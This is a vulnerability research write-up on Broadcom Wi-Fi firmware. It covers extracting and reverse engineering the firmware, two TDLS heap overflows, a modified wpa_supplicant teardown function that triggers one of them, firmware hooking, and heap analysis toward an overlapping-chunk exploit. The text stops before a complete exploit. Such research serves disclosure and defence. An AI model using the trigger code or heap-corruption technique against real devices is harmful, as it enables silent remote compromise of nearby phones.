In the past decade, the use of Wi-Fi has become commonplace on mobile devices. Gradually, Wi-Fi has evolved into a formidable set of specifications—some detailing the physical layer, others focusing on the MAC layer. In order to deal with this increased complexity, vendors have started producing “FullMAC” Wi-Fi SoCs.
In essence, these are small SoCs that perform all the PHY, MAC and MAC SubLayer Management Entity (MLME) processing on their own, allowing the operating system to abstract itself away from the complex (and sometimes chip-specific) features related to Wi-Fi. The introduction of Wi-Fi FullMAC chips has also improved the power consumption of mobile devices, since much of the processing is done on a low-power SoC instead of the power-hungry application processor. Perhaps most importantly, FullMAC chips are much easier to integrate, as they implement the MLME within their firmware, reducing the complexity on the host’s side.
All that said, the introduction of Wi-Fi FullMAC chips does not come without a cost. Introducing these new pieces of hardware, running proprietary and complex code bases, may weaken the overall security of the devices and introduce vulnerabilities which could compromise the entire system.

Exploring the Platform
To start off our research, we’ll need to find some way to explore the Wi-Fi chip. Luckily, Cypress has recently acquired Broadcom’s Wireless IOT business, and has published many of the datasheets related to Broadcom’s Wi-Fi chipsets (albeit for a slightly older SoC, the BCM4339). Reading through the datasheet, we gain some insight into the hardware architecture behind the Wi-Fi chipset.
Specifically, we can see that there’s an ARM Cortex R4 core, which runs all the logic for handling and processing frames. Moreover, the datasheet reveals that the ARM core has 640KB of ROM used to hold the firmware’s code, and 768KB of RAM which is used for data processing (e.g., heap) and to store patches to firmware code.
To start analysing the code running on the ARM core, we’ll need to extract the contents of the ROM, and to locate the data that is loaded into RAM.
Let’s start by tackling the second problem first - where is the data that’s loaded into the ARM core’s RAM? Since this data is not present in ROM, it must be loaded externally when the chip first powers on. Therefore, by reading through the initialisation code in the host’s driver, we should be able to locate the file containing the RAM’s contents. Indeed, going over the driver’s code, we find the BCMDHD_FW_PATH config, which is used to denote the location of the file whose contents are uploaded to RAM by the driver.
So what about the ROM’s contents? One way to extract the ROM would be to use the host driver’s chip memory access capabilities (via PIO over SDIO or PCIe) to read the ROM’s contents directly. However, doing so would require modifying the driver to enable us to issue the commands needed to dump the ROM. Another way to retrieve the ROM would be to load our own modified firmware file into RAM, into which we’ll insert a small stub that can be used to dump the ROM’s memory range. Luckily, none of these approaches is actually needed in this case; Broadcom provides an extremely powerful command-line utility called dhdutil, which can be used to interact with the chip via the bcmdhd driver.
Among the various capabilities this utility supports, it also allows us to directly read and write memory on the dongle by issuing a special command - “membytes”. Since we already know the size of the ROM (from the datasheet), we can just use the membytes command to read the ROM’s contents directly. However, there’s one last question we need to answer first - where is the ROM located? According to the great research done by the folks behind NexMon, the ROM is loaded at address 0x0, and the RAM is loaded at address 0x180000 (while NexMon focused on BCM4339, this fact remains true for newer chips as well, such as the BCM4358).
Finally, putting all this together, we can acquire the RAM’s contents from the firmware file, dump the ROM using dhdutil, and combine the two into a single file which we can then start analysing in IDA.

Analysing the Firmware
Due to the relatively small size of the available memory (both ROM and RAM), Broadcom went to extreme efforts in order to conserve memory. For starters, they’ve stripped the symbols and most of the strings from the binary. This has the added bonus of making it slightly more cumbersome to reverse-engineer the firmware’s code. They’ve also opted for using the Thumb-2 instruction set exclusively, which allows for better code density. As a result, the ROM image on the BCM4358 is so tightly packed that it contains less than 300 unused bytes.
However, this is still not quite enough... Remember that the RAM has to accommodate the heap, stack and global data structures, as well as all the patches or modifications to ROM functions. Quite a tall order for a measly 768KB. To get around this, Broadcom has decided to place all the functions that are only used during the firmware’s initialisation in two special regions. Once the initialisation is completed, these regions are “reclaimed”, and are thereafter converted into heap chunks.
What’s more, heap chunks are interspersed between code and data structures in RAM - since the latter sometimes have alignment requirements (or are referenced directly from ROM, so they cannot be moved). The end result is that RAM is a jumbled mess of heap chunks, code and data structures.
After spending some time analysing the firmware, we can begin identifying at least a few strings containing function names and other hints, helping us get a grasp of the code base. Additionally, the NexMon researchers have released their gathered symbols corresponding to firmware on the BCM4339. We can apply the same symbols to the BCM4339’s firmware, and then use bindiff to correlate the symbol names in newer firmware versions for more recent chips.
Lastly, there’s one more trick up our sleeve - Broadcom produces SoftMAC chips in addition to the FullMAC SoCs we’re analysing. Since these SoftMAC chips don’t handle the MLME layer, their corresponding driver must perform that processing. As a result, much of Broadcom’s MLME processing code is included in the open-source SoftMAC driver - brcmsmac. While this won’t help us out with any of the chip-specific features or the more internal processing code, it does seem to share many utility functions with the firmware’s code.

Hunting for Bugs
Now that we have a grasp of the firmware’s structure and have the means to analyse it, we can finally start hunting for bugs. But… Where should we start?
Even with all the tricks mentioned before, this is a relatively large and opaque binary, and strings or symbols are few and far between. One possibility would be to instrument the firmware in order to trace the code paths taken while a packet is received and processed. The Cortex R4 does, indeed, have debug registers which can be used to place breakpoints and inspect the code flow at various locations. Alternately, we could manually locate a set of functions which are used to parse and retrieve information from a received frame, and work our way backwards from there.
This is where familiarity with Wi-Fi comes in handy; Wi-Fi management frames encode most of their information in small “tagged” chunks of data, called Information Elements (IEs). These tagged chunks of data are structured as TLVs, where the tag and length fields are a single byte long.

Since a large portion of the information transferred in Wi-Fi frames (other than the data itself) is encoded using IEs, they make for good candidates from which we can work our way backwards. Moreover, as “tag” values are unique and standardised, we can use their values to help familiarise ourselves with the currently handled code flow.
Looking at the brcmsmac driver, we can see that there’s a single function which Broadcom uses in order to extract IEs from a frame - bcm_parse_tlvs. After a brief search (by correlating hints from nearby strings), we find the same function in the firmware’s ROM. Great.
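Such a parser boils down to a handful of lines. The following is a hedged reconstruction based on the open-source brcmsmac code (brcmu_parse_tlvs in the upstream kernel), not the firmware's exact implementation:

#include <stdint.h>

// An 802.11 Information Element: 1-byte tag, 1-byte length, then data.
struct ie_hdr {
    uint8_t tag;
    uint8_t len;
    uint8_t data[];
} __attribute__((packed));

// Return the first IE with the given tag, or NULL if none fits in buf.
static const struct ie_hdr *parse_tlvs(const void *buf, int buflen,
                                       uint8_t tag)
{
    const uint8_t *p = buf;
    while (buflen >= 2) {
        const struct ie_hdr *ie = (const struct ie_hdr *)p;
        int total = 2 + ie->len;
        if (total > buflen)
            break;              // truncated element: stop parsing
        if (ie->tag == tag)
            return ie;
        p += total;
        buflen -= total;
    }
    return NULL;
}

Note that the returned element's len field is fully attacker-controlled; validating it is entirely the call-sites' responsibility, which is precisely what the vulnerable code paths shown later fail to do.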
Now we can start cross-referencing locations which call this function, and reverse each of these call-sites. While substantially easier than reversing every part of the firmware, this still takes a considerable amount of time (as the function has more than 110 cross-references, some to other wrapper functions which themselves are called from multiple locations).
After reverse engineering all of the call sites, I’ve found a few vulnerabilities related to the handling of information elements embedded in management frames.
Two of the vulnerabilities can be triggered when connecting to networks supporting wireless roaming features: 802.11r Fast BSS Transition (FT), or Cisco’s CCKM roaming. On the one hand, these vulnerabilities should be relatively straightforward to exploit - they are simple stack overflows. Moreover, the operating system running on the firmware (HNDRTE) does not use stack cookies, so there’s no additional information leak or bypass required.
However, while these vulnerabilities may be convenient to exploit, they require some set-up to get working. First, we’d need to broadcast Wi-Fi networks that support these features. 802.11r FT is an open(-ish) standard, and is implemented by hostapd. In contrast, CCKM is a proprietary standard (although some information can be found online). Figuring out how to emulate a CCKM network (or buying a CCKM-capable WLC from Cisco) would be cumbersome (or costly).
Additionally, we’d need to figure out which devices actually support the aforementioned features. Broadcom provides many features which can be licensed by customers -- not all features are present on all devices (in fact, their corresponding patches probably wouldn’t even fit in RAM).
Luckily, Broadcom makes it easy to distinguish which features are actually present in each firmware image. The last few bytes in the RAM contents downloaded to the chip contain the firmware’s “version string”. This string contains the date at which the firmware was compiled, the chip’s revision, the firmware’s version and a list of dash-delimited “tags”. Each tag represents a feature that is supported by the firmware image. For example, here’s the version string from the Nexus 6P:
4358a3-roml/pcie-ag-p2p-pno-aoe-pktfilter-keepalive-sr-mchan-pktctx-hostpp-lpc-pwropt-txbf-wl11u-mfp-betdls-amsdutx5g-txpwr-rcc-wepso-sarctrl-btcdyn-xorcsum-proxd-gscan-linkstat-ndoe-hs20sta-oobrev-hchk-logtrace-rmon-apf-d11status Version: 7.112.201.1 (r659325) CRC: 8c7aa795 Date: Tue 2016-09-13 15:05:58 PDT Ucode Ver: 963.317 FWID: 01-ba83502b
The presence of the 802.11r FT feature is indicated by the “fbt” tag. Similarly, support for CCKM is indicated by the “ccx” tag. Unfortunately, it seems that the Nexus 6P supports neither of these features. In fact, running a quick search for the “ccx” feature (CCKM support) on my own repository of Android firmware images revealed that this feature is not supported on any Nexus device, but is supported on a wide variety of Samsung flagship devices, a very partial list of which includes the Galaxy S7 (G930F, G930V), the Galaxy S7 Edge (G935F, G9350), the Galaxy S6 Edge (G925V) and many more.
So what about the other two vulnerabilities? Both of them relate to the implementation of Tunneled Direct Link Setup (TDLS). TDLS connections allow peers on a Wi-Fi network to exchange data between one another without passing it through the Access Point (AP), thus preventing congestion at the AP.
Support for TDLS in the firmware is indicated by the “betdls” and “tdls” tags. Searching through my firmware repository I can see that the vast majority of devices do, indeed, support TDLS. This includes all recent Nexus devices (Nexus 5, 6, 6P) and most Samsung flagships.
What’s more, TDLS is specified as part of the 802.11z standard (requires IEEE subscription). Since all the information regarding TDLS is available, we could read the standard in order to gain familiarity with the relevant code paths in Broadcom’s implementation. As an open standard, it is also supported by open-source supplicants, such as wpa_supplicant. As a result, we can inspect the implementation of the TDLS features in wpa_supplicant in order to further improve our understanding of the relevant code in the firmware.
Lastly, as we’ll see later on, triggering these two vulnerabilities can be done by any peer on the Wi-Fi network, without requiring any action on the part of the device being attacked (and with no indication that such an attack is taking place). This makes these vulnerabilities all the more interesting to explore.
In any case, it seems like we’ve made our mind up! We’re going to exploit the TDLS vulnerabilities. Before we do so, however, let’s take a second to learn a little bit about TDLS, and the vulnerabilities discovered (skip this part if you’re already familiar with TDLS).
802.11z TDLS 101
There are many use cases where two peers on the same Wi-Fi network wish to transfer large swaths of data between one another. For example, casting a video from your mobile device to your Chromecast requires large amounts of data to be transmitted. In most cases, the Chromecast would be relatively close to the caster (after all, you’d probably be watching the screen to which you’re casting). Therefore, it would seem wasteful to pass the entire data stream from the device to the AP, only to then pass it on to the Chromecast.
It’s not just the increased latency of adding an additional hop (the AP) that will degrade the connection’s quality. Passing such large amounts of data to the AP would also put a strain on the AP itself, cause congestion, and would degrade the Wi-Fi connectivity for all peers on the network.
This is where TDLS comes into play. TDLS is meant to provide a means of peer-to-peer communication on a Wi-Fi network that is AP-independent.

Over The Air
Let’s start by familiarising ourselves with the structure of TDLS frames. As you may know, 802.11 frames use the “flags” field in order to indicate the “direction” in which a frame is travelling (from the client to the AP, AP to client, etc.). TDLS traffic co-opts the use of the flag values indicating traffic in an Ad-Hoc (IBSS) network (To-DS=0, From-DS=0).

Next, TDLS frames are identified by a special ethertype value - 0x890D. TDLS frames transmitted over Wi-Fi use a constant value in the “payload type” field, indicating that the payload has the following structure:

The category for TDLS frames is also set to a constant value. This leaves us with only one field which distinguishes between different TDLS frame types - the “action code”. This 1-byte field indicates the kind of TDLS frame we’re transmitting. This, in turn, controls the way in which the “payload” is interpreted by the receiving end.
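Put together, the TDLS-specific encapsulation looks roughly like the sketch below; the field names are ours, and the constant values are defined by the 802.11z standard:

#include <stdint.h>

// TDLS payload, carried in data frames with ethertype 0x890D and with
// To-DS=0, From-DS=0 in the 802.11 header.
struct tdls_frame {
    uint8_t payload_type;  // constant, marks the payload as TDLS
    uint8_t category;      // constant TDLS action category
    uint8_t action_code;   // selects the TDLS frame type...
    uint8_t payload[];     // ...and thus how this payload is interpreted
} __attribute__((packed));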
High-Level Flow

Before two peers can establish a connection, they must first know about the existence of one another. This is called the “discovery” phase. A Wi-Fi client that wishes to discover TDLS-capable peers on the network, can do so by sending a “TDLS Discovery Request” frame to a peer. A TDLS-capable peer that receives this frame, responds by sending a “TDLS Discovery Response” frame. The request and response are correlated to one another using a 1-byte “dialog token”.

Next, the peers may wish to set up a connection. To do so, they must perform a 3-way handshake. This handshake serves a dual purpose; first, it indicates that a connection is successfully established between the two peers. Second, it’s used to derive the TDLS Peer Key (TPK), which secures the TDLS traffic between the peers.

Finally, once the connection is created, the two peers can exchange peer traffic between one another. When one of the peers wishes to tear-down the connection, they may do so by sending a “TDLS Teardown” frame. Upon reception of such a frame, the TDLS-peer will remove the connection and free up all the related resources.
Now that we know enough about TDLS, let’s take a closer look at the vulnerabilities at hand!

The Primitives
In order to ensure the integrity of messages transferred during the setup and teardown phases, the corresponding TDLS frames include Message Integrity Codes (MIC). For the setup phase, once the second handshake message (M2) is received, the TPK can be derived by both parties. Using the TPK, the TDLS-initiator can calculate a MIC over the contents of the third handshake frame, which can then be verified by the TDLS-responder.
The MIC is calculated over the contents of the IEs encoded in the handshake frame, as follows:

Similarly, teardown frames also include a MIC, calculated over a slightly different set of IEs:

So how can we find these calculations in the firmware’s code? Well, as luck would have it, some strings referring to TDLS were left-over in the firmware’s ROM, allowing us to quickly home in on the relevant functions.
After reverse-engineering much of the flow leading up to the processing of handling TDLS action frames, we finally reach the function responsible for handling TDLS Setup Confirm (PMK M3) frames. The function first performs some validations to ensure that the request is legitimate. It queries the internal data structures to ensure that a TDLS connection is indeed being set up with the requesting peer. Then, it verifies the Link-ID IE (by checking that its encoded BSSID matches that of the current network), and also verifies the 32-byte initiator nonce (“Snonce”) value (by comparing it to the stored initial nonce).
Once a certain degree of confidence is established that the request may indeed be legitimate, the function moves on to call an internal helper function, tasked with calculating the MIC and ensuring that it matches the one encoded in the frame. Quite helpfully, the firmware also includes the name for this function (“wlc_tdls_cal_mic_chk”).
After reverse-engineering the function, we arrive at the following approximate high-level logic:
1.  uint8_t* buffer = malloc(256);
2.  uint8_t* pos = buffer;
3.  
4.  //Copying the initial (static) information
5.  uint8_t* linkid_ie = bcm_parse_tlvs(..., 101);
6.  memcpy(pos, linkid_ie + 0x8, 0x6);  pos += 0x6;              //Initiator MAC
7.  memcpy(pos, linkid_ie + 0xE, 0x6);  pos += 0x6;              //Responder MAC
8.  *pos = transaction_seq;             pos++;                   //TransactionSeq
9.  memcpy(pos, linkid_ie, 0x14);       pos += 0x14;             //LinkID-IE
10.
11. //Copying the RSN IE
12. uint8_t* rsn_ie = bcm_parse_tlvs(..., 48);
13. if (rsn_ie[1] + 2 + (pos - buffer) > 0xFF) {
14.     ... //Handle overflow
15. }
16. memcpy(pos, rsn_ie, rsn_ie[1] + 2); pos += rsn_ie[1] + 2;    //RSN-IE
17.
18. //Copying the remaining IEs
19. uint8_t* timeout_ie = bcm_parse_tlvs(..., 56);
20. uint8_t* ft_ie      = bcm_parse_tlvs(..., 55);
21. memcpy(pos, timeout_ie, 0x7);       pos += 0x7;              //Timeout Interval IE
22. memcpy(pos, ft_ie, 0x54);           pos += 0x54;             //Fast-Transition IE
As can be seen above, although the function verifies that the RSN IE’s length does not exceed the allocated buffer’s length (line 13), it fails to verify that the subsequent IEs also do not overflow the buffer. As such, setting the RSN IE’s length to a large value (e.g., such that rsn_ie[1] + 2 + (pos - buffer) == 0xFF) will cause the Timeout Interval and Fast Transition IEs to be copied out-of-bounds, overflowing the buffer.
For example, assuming we set the length of the RSN IE (x) to its maximal possible value, 224, we arrive at the following placements of elements:

In this diagram, orange fields are those which are “irrelevant” for the overflow, since they are positioned within the buffer’s bounds. Red fields indicate values that cannot be fully controlled by us, and green fields indicate values which are fully controllable.
For example, the Timeout Interval IE is verified prior to the MIC’s calculation and only has a constrained set of allowed values, making it uncontrollable. Similarly, the FTIE’s tag and length fields are constant, and therefore not controllable. Lastly, the 32-byte “Anonce” value is randomly chosen by the TDLS responder, placing it firmly out of our field of influence.
But the situation isn’t that grim. In fact, several of the fields in the FTIE itself can be arbitrarily chosen - for example, the “Snonce” value is chosen by the TDLS-initiator during the first message in the handshake. Moreover, the “MIC Control” field in the FTIE can be freely chosen, since it is not verified prior to the execution of this function.
In any case, now that we’ve audited the MIC verification for the setup stage, let’s turn our sights towards the MIC verification during the teardown stage. Perhaps the code is similarly broken there? Taking a look at the MIC calculation in the teardown stage (“wlc_tdls_cal_teardown_mic_chk”), we arrive at the following high-level logic:
1.  uint8_t* buffer = malloc(256);
2.  ...
3.  uint8_t* linkid_ie = bcm_parse_tlvs(..., 101); //Link ID
4.  memcpy(buffer, linkid_ie, 0x14);
5.  ...
6.  uint8_t* ft_ie = bcm_parse_tlvs(..., 55);
7.  memcpy(buffer + 0x18, ft_ie, ft_ie[1] + 2);    //Fast-Transition IE
Ah-ha, so once again a straightforward overflow; the FT-IE’s length field is not verified to ensure that it doesn’t exceed the length of the allocated buffer. This means that simply by providing a crafted FT-IE, we can trigger the overflow. Nevertheless, once again there are several verifications prior to triggering the vulnerable code path which limit our control over the overflowing elements. Let’s try and plot the placement of elements during the overflow:

This seems much simpler - we don’t need to worry ourselves about the values stored in the FTIE that are verified prior to the overflow, since they’re all placed neatly within the buffer’s range. Instead, the attacker controlled portion is simply spare data that is not subject to any verification, and can therefore be freely chosen by us. That said, the overflow’s extent is quite limited: since the FTIE is copied to offset 0x18 and its 1-byte length field caps the copy at 0xFF + 2 bytes, the copy ends at offset 0x119 at most - that is, we can only overwrite at most 25 bytes beyond the range of the 256-byte buffer.
Writing an Exploit
Investigating the Heap State
At long last we have a grasp of the primitives at hand. Now, it’s time to test out whether our hypotheses match reality. To do so, we’ll need a testbed that’ll enable us to send crafted frames, triggering the overflows. Recall that wpa_supplicant is an open-source portable supplicant that fully supports TDLS. This makes it a prime candidate for our research platform. We could use wpa_supplicant as a base on top of which we’ll craft our frames. That would save us the need to re-implement all the logic entailed in setting up and maintaining a TDLS connection.
To test out the vulnerabilities, we’ll modify wpa_supplicant to allow us to send TDLS Teardown frames containing an overly-large FTIE. Going over wpa_supplicant’s code, we can quickly identify the function in charge of generating and sending the teardown frame - wpa_tdls_send_teardown. By adding a few small changes to this function, we should be able to trigger the overflow upon reception of the teardown frame, causing 25 bytes of 0xAB to be written OOB:
static int wpa_tdls_send_teardown(struct wpa_sm *sm, const u8 *addr, u16 reason_code)
{
    ...
    ftie = (struct wpa_tdls_ftie *) pos;
    ftie->ie_type = WLAN_EID_FAST_BSS_TRANSITION;
    ftie->ie_len = 255;
    os_memset(pos + 2, 0x00, ftie->ie_len);
    os_memset(pos + ftie->ie_len + 2 - 0x19, 0xAB, 0x19); //Overflowing with 0xAB
    os_memcpy(ftie->Anonce, peer->rnonce, WPA_NONCE_LEN);
    os_memcpy(ftie->Snonce, peer->inonce, WPA_NONCE_LEN);
    pos += ftie->ie_len + 2;
    ...
}
Now we just need to interact with wpa_supplicant in order to set up and tear down a TDLS connection to our target device. Conveniently, wpa_supplicant supports many command interfaces, including a command-line utility called wpa_cli. This command line interface also supports several commands exposing TDLS functionality:
  • TDLS_DISCOVER - Sends a “TDLS Discovery Request” frame and lists the response
  • TDLS_SETUP - Creates a TDLS connection to the peer with the given MAC address
  • TDLS_TEARDOWN - Tears down the TDLS connection to the peer with the given MAC

Indeed, after compiling wpa_supplicant with TDLS support (CONFIG_TDLS), setting up a network, and connecting our target device and our research platform to the network, we can see that issuing the TDLS_DISCOVER command works - we can indeed identify our peer.

Moving on, we can now send a TDLS_SETUP command, followed by our crafted TDLS_TEARDOWN. If everything adds up correctly, this should trigger the overflow. However, this raises a slightly more subtle question - how will we know when the overflow occurs? It may just so happen that the data we’re overflowing is unused. Alternatively, it may be the case that when the firmware crashes, it just silently starts up again, leaving us none the wiser.
To answer this fully, we’ll need to understand the logic behind Broadcom’s heap implementation. Digging into the allocator’s logic, we find that it is extremely straightforward; it is a simple “best-fit” allocator, which performs forward and backward coalescing, and keeps a singly linked list of free chunks. When chunks are allocated, they are carved from the end (highest address) of the best-fitting free chunk (smallest chunk that is large enough). Heap chunks have the following structure (recall that the Cortex R4 is a 32-bit ARM processor, so all fields are stored in little-endian):
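Reconstructed in C, that layout looks roughly as follows (a sketch standing in for the original diagram; the field names are mine, and the exact layout is inferred from the allocator’s behaviour described above):

#include <stdint.h>

struct heap_chunk {
    uint32_t size;   /* chunk size - present in both free and in-use chunks */
    uint32_t next;   /* free chunks: pointer to the next free chunk;
                        zeroed when the chunk is allocated */
    uint8_t  data[]; /* user data for in-use chunks */
};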
By reverse-engineering the allocator’s implementation, we can also find the location of the pointer to the head of the first free-chunk in RAM. Combining these two facts together, we can create a utility which, given a dump of the firmware’s RAM, can plot the current state of the heap’s freelist. Acquiring a snapshot of the firmware’s RAM can be easily achieved by using dhdutil’s “upload” command.
After writing a small visualiser script which walks over the heap’s freelist and exports its contents into dot, we can plot the state of the freelist using graphviz, like so:
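The core of such a script might look like this (a minimal sketch; RAM_BASE and FREELIST_HEAD_PTR are hypothetical stand-ins for the firmware’s RAM load address and the freelist head pointer we just located):

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define RAM_BASE          0x180000u /* hypothetical RAM load address */
#define FREELIST_HEAD_PTR 0x1EF000u /* hypothetical freelist head pointer */

static uint32_t read32(const uint8_t *ram, uint32_t addr)
{
    addr -= RAM_BASE; /* translate a firmware address to a snapshot offset */
    return ram[addr] | ram[addr + 1] << 8 | ram[addr + 2] << 16 |
           ((uint32_t)ram[addr + 3]) << 24;
}

int main(int argc, char **argv)
{
    if (argc != 2)
        return 1;
    FILE *f = fopen(argv[1], "rb"); /* RAM snapshot from dhdutil's "upload" */
    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    rewind(f);
    uint8_t *ram = malloc(size);
    fread(ram, 1, size, f);
    fclose(f);

    /* Walk the singly linked freelist and emit a dot graph. */
    puts("digraph freelist {");
    for (uint32_t chunk = read32(ram, FREELIST_HEAD_PTR); chunk;
         chunk = read32(ram, chunk + 4)) {
        printf("  n%x [label=\"chunk @0x%x\\nsize=0x%x\"];\n",
               chunk, chunk, read32(ram, chunk));
        if (read32(ram, chunk + 4))
            printf("  n%x -> n%x;\n", chunk, read32(ram, chunk + 4));
    }
    puts("}");
    free(ram);
    return 0;
}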

Now, we can send our crafted TDLS_TEARDOWN frame, immediately take a snapshot of the firmware’s RAM, and check the freelist for any signs of corruption:

Ah-ha! Indeed one of the chunks in the freelist suddenly has an exceptionally large size after tearing down the connection. Recall that since the allocator uses “best-fit”, this means that subsequent allocations won’t be placed in this block as long as other large enough free chunks exist. This also means that the firmware did not crash, and in fact continued to function correctly. Had we not visualised the state of the heap, we wouldn’t have been able to tell that anything had happened at all.
In any case, now that we’ve confirmed that the overflow does in fact occur, it’s time to move to the next stage of exploitation. We need less crude tools in order to allow us to monitor the state of the heap during the setup and teardown processes. To this end, it would be advantageous to hook the malloc and free functions in the firmware, and to trace their arguments and return values.
First, we’ll need to write a “patcher”, which will allow us to insert hooks on given RAM-resident functions. It’s important to note that the malloc and free functions are both present in RAM (they are among the first functions in the RAM’s code chunk). This allows us to freely re-write their prologues in order to introduce a branch to our own code. I’ve written a patcher which performs insertion of such hooks, allowing execution of small assembly stubs before and after the invocation of the hooked function.
In short, the patcher is fairly standard - it writes the patch’s code to an unused region in RAM (the head of the largest free chunk in the heap), and then inserts a Thumb-2 wide branch (which is, coincidentally, perhaps the ugliest encoding for an opcode I’ve ever seen - see 4.6.12 T4) from the prologue of the hooked function to the hook itself.
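For the curious, producing such a wide branch boils down to the following (a sketch following encoding T4 of the B instruction; the actual patcher may differ in its details):

#include <stdint.h>

/* Encode a Thumb-2 wide branch, "B.W <target>" (encoding T4). `from` is the
   address of the branch instruction, `to` is the branch target; the offset
   must fit in +/-16MB. Returns the two halfwords packed so that writing the
   32-bit value little-endian places them correctly in memory. */
static uint32_t encode_b_w(uint32_t from, uint32_t to)
{
    int32_t  off   = (int32_t)(to - (from + 4)); /* Thumb PC reads as from+4 */
    uint32_t s     = (off >> 24) & 1;
    uint32_t i1    = (off >> 23) & 1;
    uint32_t i2    = (off >> 22) & 1;
    uint32_t imm10 = (off >> 12) & 0x3FF;
    uint32_t imm11 = (off >> 1)  & 0x7FF;
    uint32_t j1    = (~i1 ^ s) & 1; /* J1 = NOT(I1) EOR S */
    uint32_t j2    = (~i2 ^ s) & 1; /* J2 = NOT(I2) EOR S */
    uint16_t hw1   = 0xF000 | (s << 10) | imm10;               /* 11110 S imm10 */
    uint16_t hw2   = 0x9000 | (j1 << 13) | (j2 << 11) | imm11; /* 10 J1 1 J2 imm11 */
    return ((uint32_t)hw2 << 16) | hw1;
}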

Using our new patcher, we can now instrument the malloc and free functions in order to add traces allowing us to follow every operation occurring on the heap. These traces can then be read from the firmware’s console buffer, by issuing dhdutil’s “consoledump” command. Note that on some newer chips, like the BCM4358 on the Nexus 6P, this command fails. This is because Broadcom forgot to add the offset to the magic pointer in the firmware pointing to the console’s data structure. You can fix this either by adding the correct offset to the driver (see debug_info_ptrs), or by writing the magic value and pointer to one of the probed memory addresses in the list.
In any case, you can find both the malloc and free hooks, and the associated scripts needed to parse the traces from the firmware, here.
Using the newly acquired traces, we can write a better visualiser, allowing us to trace the state of the heap throughout the setup and teardown phases. This visualiser will have visibility into every operation occurring on the heap, offering far more granular data. I’ve written such a visualiser, which you can find here.
Without further ado, let’s take a look at heap activity while establishing a TDLS connection:
The vertical axis denotes time - each line is a new heap state after a malloc or free operation. The horizontal axis denotes space - lower addresses are on the left, while higher addresses are on the right. Red blocks indicate chunks that are in-use, grey blocks indicate free chunks.
As we can clearly see above, establishing a TDLS connection is a messy operation. There are many allocations and deallocations, for regions both large and small. This abundance of noise doesn’t bode well for us. Recall that the overflow during the setup stage is highly constrained, both in terms of the data being written, and in terms of the extent of the overflowing data. Moreover, the overflow occurs during one of the many allocations in the setup phase. This doesn’t allow us much control over the state of the heap prior to triggering the overflow.
Taking a step back, however, we can observe a fairly surprising fact. Apart from the heap activity during the TDLS connection establishment, it seems like there is little to no activity on the heap whatsoever. In fact, it turns out that transmitted and received frames are drawn from a shared pool, instead of the heap. Not only that, but their processing doesn’t incur a single heap operation - everything is done “in-place”. Even when trying to intentionally cause allocations by sending random frames containing exotic bit combinations, the firmware’s heap remains largely unaffected.
This is both a blessing and a curse. On the one hand, it means that the heap’s structure is highly consistent. On the rare occasions that data structures are allocated, they are immediately freed thereafter, restoring the heap to its original state. On the other hand, it means that our degree of control over the heap’s structure is fairly limited. For the most part, whatever structure the heap has after the firmware’s initialisation is what we’re going to have to work with (unless, of course, we find some primitive that will allow us to better shape the heap).
Perhaps we should take a look at the teardown stage instead? Indeed, activating the traces during the TDLS teardown stage reveals that there are very few allocations prior to triggering the overflow, so it seems like a much more convenient environment to explore.

While these in-depth traces are useful for getting a high-level view of the heap’s state, they are rather difficult to decipher. In fact, in most cases it’s sufficient to take a single snapshot of the heap and just visualise it, as we did earlier with the graphviz visualiser. In that case, let’s improve our previous heap visualiser by allowing it to produce detailed graphical output, based on a single snapshot of the heap.
As we’ve seen earlier, we can “walk” over the freelist to extract the location and size of each free chunk. Moreover, we can deduce the location of in-use chunks by walking over the gaps between free chunks and reading the “size” field from each in-use chunk. I’ve written yet another visualiser that does just that - it simply produces a visualisation of the heap’s state from a series of “snapshot” images.
Using this visualiser, we can now take a look at the state of the heap after setting up a TDLS connection. This will be the state of the heap we need to work with when we trigger the overflow during the teardown stage.
(Upper Layer: initial heap state, Bottom Layer: heap state after creating a TDLS connection)
We can see that after setting up the TDLS connection, most of the heap’s used chunks are consecutive, but also two holes are formed; one of size 0x11C, and another of size 0x124. Activating the traces for the teardown stage, we can see that the following allocations occur:
(29) malloc - size: 284, caller: 1828bb, res: 1f0404
(30) free - ptr: 1f0404
(31) malloc - size: 20, caller: 18c811, res: 1f1654
(32) malloc - size: 160, caller: 18c811, res: 1f0480
(33) malloc - size: 8, caller: 80eb, res: 1f2a44
(34) free - ptr: 1f2a44
(35) free - ptr: 1f1654
(36) free - ptr: 1f0480
(37) malloc - size: 256, caller: 7aa15, res: 1f0420
(38) malloc - size: 16, caller: 7aa23, res: 1f1658
The highlighted line - (37) - denotes the allocation of the 256-byte buffer for the teardown frame’s MIC calculation, the same one we can overflow using our vulnerability. Moreover, it seems as though the heap activity is quite low prior to sending the overflow frame. Combining the heap snapshot above with the trace file, we can deduce that the best-fitting chunk for the 256-byte buffer is in the 0x11C-byte hole. This means that using our 25-byte overflow we’ll be able to overwrite:
  1. The header of the next in-use chunk
  2. A few bytes from the contents of the next in-use chunk

Let’s take a closer look at the next in-use chunk and see whether there’s any interesting information that we’d like to overwrite there:

Ah, so the next chunk is mostly empty, save for a couple of pointers near its head. Are these pointers of any use to us? Perhaps they are written to? Or freed at a later stage? We can find out by manually corrupting these pointers (pointing them at invalid memory addresses, such as 0xCDCDCDCD), and instrumenting the firmware’s exception vector to see whether it crashes. Unfortunately, after many such attempts, it seems as though none of these pointers are in fact used.
This leaves us, therefore, with a single possibility - corrupting the “size” field of the in-use chunk. Recall that once the TDLS connection is torn down, the data structures relating to it are freed. Freeing an in-use chunk whose size we’ve corrupted could have many interesting consequences. For starters, if we reduce the size of the chunk, we can intentionally “leak” the tail end of the buffer, causing it to remain forever un-allocatable. Much more interestingly, however, we could set the chunk’s size to a larger value, thereby causing the next free operation to create a free chunk whose tail end overlaps another heap chunk.

Once a free chunk overlaps another heap chunk, subsequent allocations for which the overlapping free chunk is the best-fit will be carved from the end of the free chunk, thereby corrupting whatever fields reside at its tail. Before we start scheming, however, we need to confirm that we can create such a state (i.e., an overlapping chunk), after the teardown operation completes.
Creating an Overlapping Chunk
Recall that the MIC check is just one of many operations that take place when a TDLS connection is torn down. It may just so happen that by overwriting the next chunk’s size, once it is freed during the collection of the TDLS session’s data structures, it may become the best-fit for subsequent allocations during the teardown process. These allocations may then cause additional unintended corruptions, which will either leave the heap in a non-consistent state or even crash the firmware.
